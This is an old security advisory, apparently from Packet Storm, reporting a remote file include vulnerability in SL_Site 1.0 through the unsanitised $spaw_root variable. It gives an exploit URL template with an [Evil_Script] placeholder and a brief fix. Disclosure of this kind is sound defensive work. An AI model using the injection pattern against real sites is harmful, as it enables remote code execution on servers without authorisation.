slsite10.txt

2006-09-08T00:00:00
ID PACKETSTORM:49814
Type packetstorm
Reporter Kw3rLN
Modified 2006-09-08T00:00:00

Description

                                        
                                            `---------------------------------------------------------------------------  
SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability  
---------------------------------------------------------------------------  
  
  
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :  
Remote : Yes  
Critical Level : Dangerous  
---------------------------------------------------------------------------  
  
Affected software description :  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Application : SL_Site  
version : 1.0  
URL : ftp://ftp1.comscripts.com/PHP/2032_slsite-10.zip  
------------------------------------------------------------------  
  
  
Exploit:  
~~~~~~  
Variable $spaw_root not sanitized.When register_globals=on an attacker ca  
n exploit this vulnerability with a simple php injection script.  
  
# http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script]  
---------------------------------------------------------------------------  
  
Solution :  
~~~~~~~~  
declare variabel $spaw_root  
---------------------------------------------------------------------------  
  
  
Shoutz:  
~~~~  
  
# Special greetz to my good friend [Oo]  
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]  
---------------------------------------------------------------------------  
  
*/  
  
Contact:  
~~~~~~  
  
Nick: Kw3rLn  
E-mail: ciriboflacs[at]YaHoo[dot]Com  
Homepage: hTTp://RST-CREW.NET  
_/*  
  
-------------------------------- [ EOF] ----------------------------------  
`